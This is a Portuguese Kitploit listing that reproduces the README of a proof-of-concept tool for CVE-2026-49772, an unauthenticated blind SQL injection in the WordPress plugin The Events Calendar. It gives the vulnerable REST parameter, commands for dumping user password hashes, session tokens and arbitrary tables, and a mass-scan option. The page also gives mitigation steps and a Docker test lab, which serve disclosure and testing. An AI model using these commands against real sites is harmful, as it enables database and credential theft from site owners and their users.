Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-49772 — CVE-2026-49772 — The Events Calendar (WordPress) PoC de SQLi cego não autenticado | Kitploit
Ferramentas/GitHubGitHub/joshuavanderpoll/cve-2026-49772
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubjoshuavanderpoll/cve-2026-49772

CVE-2026-49772

CVE-2026-49772 — The Events Calendar (WordPress) PoC de SQLi cego não autenticado

Ver Repositório
3há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Prova de Conceito de Injeção SQL no The Events Calendar (CVE-2026-49772)

Python

Descrição

CVE-2026-49772 é uma injeção SQL cega não autenticada no plugin WordPress The Events Calendar. Um validador de parâmetro REST quebrado (validate_callback retorna uma closure em vez de validar) permite que o parâmetro order na API REST experimental tec/v1 atinja a cláusula ORDER BY do SQL sem sanitização:

root@kitploit:~
GET /wp-json/tec/v1/events?orderby=event_date&order=<INJECTION>
root@kitploit:~
... ORDER BY event_date <INJECTION>, wp_posts.post_date DESC ...

Esta é uma injeção somente leitura (sem consultas empilhadas, sem gravações, sem saída direta) — mas todo o banco de dados pode ser extraído via um oráculo booleano/baseado em tempo: hashes de senha de usuário, tokens de sessão, senhas de aplicativo, chaves secretas.

Versões afetadas: The Events Calendar 6.15.12 – 6.16.2 (corrigido na versão 6.16.3) Gravidade: CVSS 3.1 9.3 Crítico — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Funcionalidades

  • --check — Detecção não intrusiva: namespace REST, versão do plugin, confirmação baseada em tempo
  • --recon — Impressão digital do banco: versão, usuário atual, banco, SO, privilégios, prefixo de tabela
  • --users — Extrair wp_users: logins, e-mails, hashes de senha
  • --user-meta — Extrair wp_usermeta: tokens de sessão, senhas de aplicativo, capacidades
  • --get-table — Extrair qualquer tabela com descoberta automática de colunas
  • --query — Extrair o resultado de qualquer SELECT escalar
  • Dois oráculos — booleano rápido (padrão) ou baseado em tempo, multithread; sem dependências externas

Instalação

Apenas biblioteca padrão Python 3 — requirements.txt está incluído para o fluxo padrão, mas não instala nada extra.

OSX / Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
python3 CVE-2026-49772.py --help

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python CVE-2026-49772.py --help

Uso

root@kitploit:~
python3 CVE-2026-49772.py <target> <acao> [opcoes]

Escolha exatamente uma ação: --check, --recon, --users, --user-meta, --get-table <TABELA>, --query <SQL>. Execute --help para todas as opções.


Verificação de vulnerabilidade

root@kitploit:~
python3 CVE-2026-49772.py target.tld --check

Reconhecimento do banco

root@kitploit:~
python3 CVE-2026-49772.py target.tld --recon

Extrair usuários + hashes de senha

root@kitploit:~
python3 CVE-2026-49772.py target.tld --users

Extrair um valor personalizado

root@kitploit:~
python3 CVE-2026-49772.py target.tld --query "SELECT @@version"

Ajustes: --technique boolean|time, --delay, --threads, --rows, --prefix, --where, -useragent, -timeout. Escaneie muitos hosts com -l targets.txt.

Docker PoC

Um laboratório Docker Compose autocontido com o plugin vulnerável (incluído, não baixado na inicialização) e eventos pré-preenchidos. Veja docker/DOCKER.md.

root@kitploit:~
cd docker/
docker compose up -d
python3 ../CVE-2026-49772.py localhost:8080 --check

Mitigação

  • Atualize o The Events Calendar para 6.16.3 ou superior
  • Até que seja corrigido, bloqueie /wp-json/tec/v1/ no WAF / proxy reverso

Referências

  • The Events Calendar
  • CVE.org — CVE-2026-49772
  • NVD — CVE-2026-49772
  • GitHub Advisory — GHSA-v796-wqfq-j4xh
  • Patchstack — The Events Calendar SQL Injection

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de pesquisa. Use-a apenas contra sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar. O criador não assume nenhuma responsabilidade por qualquer uso indevido ou dano causado por esta ferramenta.

Baixar ferramenta